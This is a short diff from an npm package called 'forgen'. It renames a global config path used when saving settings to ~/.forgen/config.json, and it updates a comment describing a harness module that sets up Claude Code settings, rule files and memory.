             return JSON.parse(fs.readFileSync(GLOBAL_CONFIG, 'utf-8'));
         }
-        catch { /* fall through */ }
+        catch { /* malformed — use defaults */ }
     }
     return {};
 }
-/** v1 config 저장 (~/.forgen/config.json) */
+/** 글로벌 config 저장 (~/.forgen/config.json) */
 export function saveGlobalConfig(config) {
-    fs.mkdirSync(path.dirname(V1_GLOBAL_CONFIG), { recursive: true });
-    fs.writeFileSync(V1_GLOBAL_CONFIG, JSON.stringify(config, null, 2));
+    fs.mkdirSync(path.dirname(GLOBAL_CONFIG), { recursive: true });
+    fs.writeFileSync(GLOBAL_CONFIG, JSON.stringify(config, null, 2));
 }

package/dist/core/harness.d.ts CHANGED Viewed

@@ -5,11 +5,9 @@
  * philosophy/scope/pack 의존 제거. Profile + Preset Manager + Rule Renderer.
  *
  * Module Structure:
- * - Lines 1-70: Imports, utility helpers
- * - Lines 70-220: injectSettings — Claude Code settings.json injection
- * - Lines 220-400: Agent/skill installation helpers
- * - Lines 400-550: Rule file injection, gitignore, compound memory
- * - Lines 550+: prepareHarness — main orchestration
+ * - Lines 1-50: Imports, utility helpers
+ * - Lines 50-120: Rule file injection, gitignore, compound memory
+ * - Lines 120+: prepareHarness — main orchestration
  */
 import { type RuntimeHost } from './types.js';
 import { rollbackSettings } from './settings-lock.js';